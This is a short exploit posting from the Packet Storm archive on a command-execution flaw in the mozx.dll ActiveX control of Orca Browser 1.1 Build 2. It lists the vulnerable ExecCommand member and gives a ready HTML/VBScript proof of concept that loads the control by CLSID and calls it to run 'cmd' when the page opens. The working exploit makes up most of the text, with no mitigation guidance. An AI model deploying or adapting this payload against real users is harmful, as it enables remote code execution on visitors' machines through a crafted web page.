Orca Browser version 1.1 Build 2 suffers from an Active-X related command execution vulnerability.
dfa1e771773ea686fa70b40028829836ae89a2d672169b8ebb2efbba76028c08"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute
#[+] Bug : Orca Browser 1.1 Build 2 (mozx.dll) ActiveX Command Execution
#[+] program Download : http://www.orcabrowser.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
targetFile = "C:\Program Files\Orca Browser\mozx.dll"
prototype = "Sub ExecCommand ( ByVal ACommandID As Long , ByRef AParams As stdole.DISPPARAMS )"
memberName = "ExecCommand"
progid = "MOZXLib.EmbeddedMoz"
argCount = 2
------------------------------------
<html>
<object classid='clsid:7606693A-C18D-4567-AF85-6194FF70761E' id='expl' ></object>
<script language='vbscript'>
expl.ExecCommand "cmd" ,0
</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed